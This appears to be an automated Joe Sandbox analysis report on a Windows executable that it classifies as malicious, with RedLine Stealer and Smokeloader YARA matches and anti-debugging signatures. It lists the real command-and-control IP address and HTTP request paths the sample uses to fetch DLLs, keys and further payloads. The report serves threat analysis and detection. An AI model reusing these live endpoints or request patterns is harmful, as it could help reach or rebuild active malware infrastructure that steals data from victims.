Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4kahanaK78.exe

Overview

General Information

Sample name:4kahanaK78.exe
renamed because original name is a hash value
Original sample name:3c2e26d10fa55af2e913120df3b7eddb.exe
Analysis ID:1578915
MD5:3c2e26d10fa55af2e913120df3b7eddb
SHA1:a6ba8c6378d44616d7196331c6ea54e286136ce6
SHA256:4463effeb9799edfe6c07776f1e044718792fabb6ea103b9ee016e5efd21a985
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 4kahanaK78.exe (PID: 4128 cmdline: "C:\Users\user\Desktop\4kahanaK78.exe" MD5: 3C2E26D10FA55AF2E913120DF3B7EDDB)
    • WerFault.exe (PID: 5136 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4128 -s 1516 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.3307293303.0000000000D89000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: 4kahanaK78.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: 4kahanaK78.exeReversingLabs: Detection: 60%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: 4kahanaK78.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_004034C0 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_004034C0
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_04B43727 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_04B43727
Source: 4kahanaK78.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\4kahanaK78.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00415D07 FindFirstFileExW,0_2_00415D07
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_10007EA9 FindFirstFileExW,0_2_10007EA9
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_04B55F6E FindFirstFileExW,0_2_04B55F6E
Source: Joe Sandbox ViewIP Address: 185.156.73.23 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,0_2_00401880
Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp
Source: 4kahanaK78.exe, 00000000.00000002.3307314841.0000000000E27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/download
Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/key
Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/key8
Source: 4kahanaK78.exe, 00000000.00000002.3307314841.0000000000E27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download
Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download23/add?substr=mixtwo&s=three&sub=emp
Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadhw
Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadpData
Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadpwT
Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadvwR
Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadw$
Source: 4kahanaK78.exe, 00000000.00000002.3309569416.000000000595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/download
Source: 4kahanaK78.exe, 00000000.00000002.3307314841.0000000000E27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/downloadL9
Source: 4kahanaK78.exe, 00000000.00000002.3307314841.0000000000E27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/downloadv9
Source: 4kahanaK78.exe, 00000000.00000002.3309317789.00000000055AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23H
Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.3307293303.0000000000D89000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
PE file contains section with special chars
Source: 4kahanaK78.exeStatic PE information: section name:
Source: 4kahanaK78.exeStatic PE information: section name: .idata
Source: 4kahanaK78.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\4kahanaK78.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_3_04CF7CAA0_3_04CF7CAA
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_3_04CE9D600_3_04CE9D60
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_3_04CE3EC00_3_04CE3EC0
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_3_04CEC7DD0_3_04CEC7DD
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_3_04CF37F90_3_04CF37F9
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_3_04CF97F20_3_04CF97F2
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_3_04CEE7200_3_04CEE720
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_3_04CF30E60_3_04CF30E6
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_3_04CE20700_3_04CE2070
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_3_04CF99120_3_04CF9912
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_3_04CECA0F0_3_04CECA0F
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00404AC00_2_00404AC0
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00402C700_2_00402C70
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_004188AA0_2_004188AA
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_0040A9600_2_0040A960
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_0040F3200_2_0040F320
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_0040D3DD0_2_0040D3DD
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_0041A3F20_2_0041A3F2
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_004143F90_2_004143F9
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00413CE60_2_00413CE6
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_0041A5120_2_0041A512
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_0040D60F0_2_0040D60F
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_1000E1840_2_1000E184
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_100102A00_2_100102A0
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA4C460_2_00AA4C46
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_008546A30_2_008546A3
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_009910B00_2_009910B0
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_009820D70_2_009820D7
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_009694FC0_2_009694FC
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00983C200_2_00983C20
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_009856460_2_00985646
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_0098E78B0_2_0098E78B
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_0098F5BF0_2_0098F5BF
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00992BDC0_2_00992BDC
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_0098BFEA0_2_0098BFEA
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_0088D9180_2_0088D918
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00882F330_2_00882F33
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_009805500_2_00980550
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_04B4F5870_2_04B4F587
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_04B44D270_2_04B44D27
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_04B5A6590_2_04B5A659
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_04B4D6440_2_04B4D644
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_04B5A7790_2_04B5A779
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_04B53F4D0_2_04B53F4D
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_04B44D270_2_04B44D27
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_04B4D8760_2_04B4D876
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_04B4ABC70_2_04B4ABC7
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: String function: 04B49E07 appears 35 times
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: String function: 04CE8FA0 appears 35 times
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: String function: 10003160 appears 34 times
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: String function: 00409BA0 appears 35 times
Source: C:\Users\user\Desktop\4kahanaK78.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4128 -s 1516
Source: 4kahanaK78.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.3307293303.0000000000D89000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 4kahanaK78.exeStatic PE information: Section: bqzwvadu ZLIB complexity 0.9901198913843888
Source: classification engineClassification label: mal100.evad.winEXE@2/10@0/1
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402950
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00D897C6 CreateToolhelp32Snapshot,Module32First,0_2_00D897C6
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,0_2_00401880
Source: C:\Users\user\Desktop\4kahanaK78.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\add[1].htmJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4128
Source: C:\Users\user\Desktop\4kahanaK78.exeFile created: C:\Users\user\AppData\Local\Temp\0e52GN0wDABsdJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeCommand line argument: emp0_2_00408020
Source: C:\Users\user\Desktop\4kahanaK78.exeCommand line argument: mixtwo0_2_00408020
Source: C:\Users\user\Desktop\4kahanaK78.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 4kahanaK78.exeReversingLabs: Detection: 60%
Source: 4kahanaK78.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknownProcess created: C:\Users\user\Desktop\4kahanaK78.exe "C:\Users\user\Desktop\4kahanaK78.exe"
Source: C:\Users\user\Desktop\4kahanaK78.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4128 -s 1516
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: 4kahanaK78.exeStatic file information: File size 1933312 > 1048576
Source: C:\Users\user\Desktop\4kahanaK78.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: 4kahanaK78.exeStatic PE information: Raw size of bqzwvadu is bigger than: 0x100000 < 0x1a8600

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
